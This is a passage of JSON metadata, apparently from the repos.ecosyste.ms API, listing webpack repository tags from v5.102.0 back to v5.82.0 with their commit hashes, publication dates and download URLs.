webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit